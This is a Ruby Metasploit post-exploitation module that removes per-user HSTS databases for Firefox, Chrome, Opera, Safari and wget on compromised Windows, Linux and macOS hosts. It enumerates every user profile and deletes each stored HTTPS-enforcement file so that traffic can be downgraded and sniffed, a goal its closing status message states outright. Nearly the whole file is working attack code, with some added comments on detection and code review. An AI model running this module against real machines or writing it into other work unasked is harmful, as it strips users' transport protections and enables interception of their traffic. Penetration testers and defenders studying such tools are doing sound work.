##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
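# Post module that deletes the per-user, on-disk HSTS (HTTP Strict Transport
# Security) state of Mozilla Firefox, Google Chrome, Opera, Safari and wget
# on a compromised host (Windows, Linux/Unix or macOS session).
#
# Security relevance: once a client's stored HSTS entry for a host is gone,
# that client no longer remembers to insist on HTTPS for the host until it
# receives the Strict-Transport-Security header again. Only the state files
# named in #hsts_db_paths are touched; entries a browser ships built in
# (the preload list) are not kept in these files and are presumably
# unaffected -- confirm per browser.
#
# Detection: the files named in #hsts_db_paths are normally written only by
# the owning browser or tool, so a delete of one of them by any other process
# is a useful file-integrity / EDR signal.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::OSX::System
  include Msf::Post::Unix

  # Registers the module metadata and the mandatory DISCLAIMER option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Web browsers HSTS entries eraser',
      'Description'  => %q{
        This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
        Google Chrome, Opera, Safari and wget.
      },
      'License'      => MSF_LICENSE,
      'Author'       =>
        [
          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
        ],
      'Platform'     => %w(linux osx unix win),
      'Arch'         => [ARCH_X86, ARCH_X64],
      'References'   =>
        [
          ['URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html'],
          ['URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf']
        ],
      'SessionTypes' => %w(meterpreter shell)
    ))

    # The option defaults to false, so the destructive action never runs
    # unless the operator explicitly acknowledges it.
    register_options([
      OptBool.new('DISCLAIMER',
        [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
    ])
  end

  # Deletes every HSTS state file found for every enumerated user profile.
  #
  # Returns early, deleting nothing, unless DISCLAIMER is set. The closing
  # status line reports whether anything was actually removed, so the
  # operator's record of what changed on the target is accurate.
  #
  # @return [void]
  def run
    # Strict comparison on purpose: only a real boolean true opens the gate,
    # a merely truthy value (for example a non-empty string) does not.
    unless datastore['DISCLAIMER'] == true
      print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.")
      return
    end

    removed = 0
    user_profiles.each do |user_profile|
      account = user_profile['UserName']

      hsts_db_paths(user_profile).each_pair do |browser, path|
        # For Firefox the table holds the profiles directory, not the file.
        path = firefox_hsts_db(path) if browser == 'Firefox'
        next unless path && file?(path)

        print_status "Removing #{browser} HSTS database for #{account}..."
        file_rm(path)
        removed += 1
      end
    end

    # Previously the success line was printed even when no file existed or
    # the platform was not recognized.
    if removed.zero?
      print_status 'No HSTS databases were found; nothing was removed.'
    else
      print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)"
    end
  end

  # Enumerates the user profiles on the target.
  #
  # Linux/Unix: one entry per directory under /home. macOS: one entry per
  # name printed by `ls /Users`, except 'Shared'. Windows: whatever
  # grab_user_profiles returns (defined outside this file).
  #
  # @return [Array<Hash>] hashes with 'UserName' and, depending on the
  #   platform, 'AppData' and/or 'LocalAppData'. Empty when the platform is
  #   not recognized.
  def user_profiles
    profiles = []

    case session.platform
    when /unix|linux/
      # 'LocalAppData' is reused to carry the home directory on this branch.
      dir("/home").reject { |u| %w(. ..).include?(u) }.each do |user_name|
        profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
      end
    when /osx/
      # NOTE(review): split breaks names on whitespace, so an account name
      # containing a space would yield several bogus entries.
      user_names = session.shell_command("ls /Users").split
      user_names.reject { |u| u == 'Shared' }.each do |user_name|
        profiles.push(
          'UserName'     => user_name,
          "AppData"      => "/Users/#{user_name}/Library",
          "LocalAppData" => "/Users/#{user_name}/Library/Application Support"
        )
      end
    when /windows/
      profiles |= grab_user_profiles
    else
      print_error "Error getting user profile data!"
    end

    profiles
  end

  # @return [String] the path separator for the session's platform.
  def system_separator
    session.platform == 'windows' ? '\\' : '/'
  end

  private

  # Builds the browser => path table for one user profile.
  #
  # Every value is the HSTS state file itself, except 'Firefox', whose value
  # is the profiles directory (resolved later by #firefox_hsts_db).
  #
  # @param user_profile [Hash] one entry returned by #user_profiles.
  # @return [Hash{String => String}] empty when the platform is not
  #   recognized (an error is printed in that case).
  def hsts_db_paths(user_profile)
    case session.platform
    when 'windows'
      {
        'Chrome'  => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
        'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", # Just path for now
        'Opera'   => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
      }
    when 'unix', 'linux'
      {
        'Chrome'  => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
        'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", # Just path for now
        'Opera'   => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
        'wget'    => "#{user_profile['LocalAppData']}/.wget-hsts"
      }
    when 'osx'
      {
        'Chrome'  => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
        'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", # Just path for now
        'Opera'   => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
        'Safari'  => "#{user_profile['AppData']}/Cookies/HSTS.plist"
      }
    else
      print_error "Platform not recognized: #{session.platform}"
      {}
    end
  end

  # Resolves the Firefox HSTS state file inside a profiles directory.
  #
  # Uses the first directory entry whose name contains ".default"; any
  # further matching profile directories are ignored, as before.
  #
  # @param profiles_dir [String] the Firefox profiles directory.
  # @return [String, nil] path to SiteSecurityServiceState.txt, or nil when
  #   the directory is missing or holds no matching profile.
  def firefox_hsts_db(profiles_dir)
    return nil unless directory?(profiles_dir)

    profile = dir(profiles_dir).find { |entry| entry.include?('.default') }
    return nil unless profile

    [profiles_dir, profile, 'SiteSecurityServiceState.txt'].join(system_separator)
  end
end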